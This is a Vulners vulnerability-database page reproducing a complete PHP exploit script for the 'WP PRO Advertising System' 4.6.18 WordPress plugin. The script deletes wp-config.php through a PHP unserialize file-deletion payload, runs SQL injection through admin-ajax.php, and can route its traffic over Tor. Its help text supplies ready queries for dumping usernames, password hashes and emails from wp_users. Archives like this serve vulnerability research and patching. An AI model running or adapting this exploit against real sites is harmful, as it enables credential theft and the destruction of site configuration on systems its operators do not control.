Vulners
Lucene search
WordPress WP PRO Advertising System 4.6.18 Plugin - SQL Injection
<?php
/**
* Exploit Titie: WP PRO Advertising System - All In One Ad Manager Exploit
* Google Dork:
* Exploit Author: wp0Day.com <[email protected]>
* Vendor Homepage: http://wordpress-advertising.com/
* Software Link: http://codecanyon.net/item/wp-pro-advertising-system-all-in-one-ad-manager/269693
* Version: 4.6.18
* Tested on: Debian 8, PHP 5.6.17-3
* Type: SQLi, Unserialize, File Delete.
* Time line: Found [06-May-2016], Vendor notified [06-May-2016], Vendor fixed: [???], [RD:1464914936]
*/
require_once('curl.php');
//OR
//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php');
$curl = new CurlWrapper();
$options = getopt("t:m:f:c:u:p:s:",array('tor:'));
print_r($options);
$options = validateInput($options);
if (!$options){
showHelp();
}
if ($options['tor'] === true)
{
echo " ### USING TOR ###\n";
echo "Setting TOR Proxy...\n";
$curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/");
$curl->addOption(CURLOPT_PROXYTYPE,7);
echo "Checking IPv4 Address\n";
$curl->get('https://dynamicdns.park-your-domain.com/getip');
echo "Got IP : ".$curl->getResponse()."\n";
echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
$answer = fgets(fopen ("php://stdin","r"));
if(trim($answer) != 'wololo'){
die("Aborting!\n");
}
echo "OK...\n";
}
class CPDF_Adapter{
private $_image_cache;
public function set_file($file){
$this->_image_cache = array($file);
}
}
function logIn(){
global $curl, $options;
file_put_contents('cookies.txt',"\n");
$curl->setCookieFile('cookies.txt');
$curl->get($options['t']);
$data = array('log'=>$options['u'], 'pwd'=>$options['p'], 'redirect_to'=>$options['t'], 'wp-submit'=>'Log In');
$curl->post($options['t'].'/wp-login.php', $data);
$status = $curl->getTransferInfo('http_code');
if ($status !== 302){
echo "Login probably failed, aborting...\n";
echo "Login response saved to login.html.\n";
die();
}
file_put_contents('login.html',$curl->getResponse());
}
function exploit(){
global $curl, $options;
if ($options['m'] == 'd'){
echo "Delete mode\n";
$pay_load_obj = new CPDF_Adapter();
$pay_load_obj->set_file('../../../../../../wp-config.php', '../../../../../../wp-config.php' );
$pay_load = base64_encode(serialize(array($pay_load_obj)));
$data = array('stats_pdf'=>'1', 'data'=>$pay_load);
$curl->post($options['t'].'?'.http_build_query($data));
$resp = $curl->getResponse();
echo $resp;
} else {
echo "SQLi mode \n";
echo "Trying a longin...\n";
logIn();
echo "Running SQL in Inject mode: ".$options['s']."\n";
$pay_load = array('action'=>'load_stats', 'group'=>'1=1 UNION ALL SELECT ('.$options['s'].') LIMIT 1,1# ', 'group_id'=>'1', 'rid'=>1);
$curl->post($options['t'].'/wp-admin/admin-ajax.php', $pay_load);
$resp = $curl->getResponse();
//Grab the output
if (preg_match('~<div class="am_data">(.*?)(?:</div)~', $resp, $mat)){
if (isset($mat[1])){
echo "Response:\n".$mat[1]."\n";
die("Done\n");
}
}
echo "Failed getting SQLi response, response saved to resp.html\n";
file_put_contents('resp.html', $resp);
}
}
exploit();
function validateInput($options){
if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){
return false;
}
if (!preg_match('~/$~',$options['t'])){
$options['t'] = $options['t'].'/';
}
if (!isset($options['m']) || !in_array($options['m'], array('d','s') ) ){
return false;
}
if ($options['m'] == 's' && (!isset($options['u']) || !isset($options['p']) || !isset($options['s'])) ){
return false;
}
$options['tor'] = isset($options['tor']);
return $options;
}
function showHelp(){
global $argv;
$help = <<<EOD
WP PRO Advertising System - All In One Ad Manager Expoit Pack
Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -u [USER] -p [password] -m [MODE] -s [SQL]
*** In order to use the SQLi part you need an advertiser login **
[TARGET_URL] http://localhost/wordpress/
[MODE] d - Delete wp-config.php
s - SQL Injection
[TOR] Use tor network? (Connects to 127.0.0.1:9150)
Note: In SQLi mode, you can't use ' or ", and you are in a subselect.
To get all users and passwords you would do :
SELECT concat(user_login,0x3a,user_pass,0x3a,user_email) FROM wp_users LIMIT 1
SELECT concat(user_login,0x3a,user_pass) FROM wp_users LIMIT 1,1
SELECT concat(user_login,0x3a,user_pass) FROM wp_users LIMIT 2,1
Examples:
php $argv[0] -t http://localhost/wordpress --tor=yes -u user -p password -m d // Try to delete some files
php $argv[0] -t http://localhost/wordpress -u user -p password -m s -s 'SELECT concat(user_login,0x3a,user_pass,0x3a,user_email) FROM wp_users LIMIT 1'
Misc:
CURL Wrapper by Leonid Svyatov <[email protected]>
@link http://github.com/svyatov/CurlWrapper
@license http://www.opensource.org/licenses/mit-license.html MIT License
EOD;
echo $help."\n\n";
die();
}
# 0day.today [2018-04-02] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Jun 2016 00:00Current
7.1High risk
Vulners AI Score7.1